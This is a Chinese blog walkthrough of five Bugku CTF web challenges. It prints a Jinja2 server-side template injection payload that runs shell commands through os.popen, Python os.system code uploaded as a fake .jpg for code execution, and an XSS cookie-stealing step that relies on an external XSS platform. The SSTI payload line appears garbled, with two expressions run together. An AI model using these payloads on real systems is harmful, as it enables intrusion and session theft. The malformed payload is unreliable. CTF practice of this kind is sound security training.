【bugku靶场 1 至 5 关】持续更新ing。。。

第一关:Simple_SSTI_1

b6f84d474fda46a0ac584d6bcdd31653.png

99495207336a40129f4263dbc36d3ff4.png第二关:Simple_SSTI_2

输入/?flag={{config.__class__.__init__.__globals__['os'].popen('grep -r flag{ ./').read()}}_builtins__['eval']("__import__('os').popen('cat flag').read()")}}

869023565bc341fa92ccf82fc1c9cc0d.png

673ca8f15582406881fcdaab9d85e8a8.png第三关:Flask_FileUpload

打开环境,访问 查看源代码

cd5a6da81a024f89bca5ed206627cad9.png

这句话的意思是:“给我这个文件,我将通过 Python 为您返回运行结果!”

新建一个jpg文件,里面写入代码

import os 
os.system('ls /')

查看页面源代码,看到有一个flag文件

dc5743e59232453db99a01d9d433e90d.png

利用Python语句查看flag文件

import os
os.system('cat /flag')

f7bfcfa317994a058a443338350ce29c.png

31022f7679db4be48bf7761a8d655ae5.png

 

第四关:留言板

看见提示,是xss漏洞

96b1fe84777c4e8aac67dd77e20c1661.png

在xss平台新建项目 

xss平台的网址:XSS平台-XSS测试网站-仅用于安全免费测试

复制下图的代码,在留言区插入

b12f2335ac284e86b039b9be584b40b5.png

访问admin.php使用管理员账号密码登录,然后查看xss平台的cookie,看到了flag字样,但好像被编码了

5758f99baa514de0947007bf2ed77885.png

使用在线url解码工具得到flag

09b11f66139d4d00a5aa29b94ff50e3e.png

第五关:滑稽

这道题确实滑稽

e81200a2a3154ad0a1308bd72e9802ee.png

f12结束

6ddadd5628bb451482494e8c290f4797.png

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值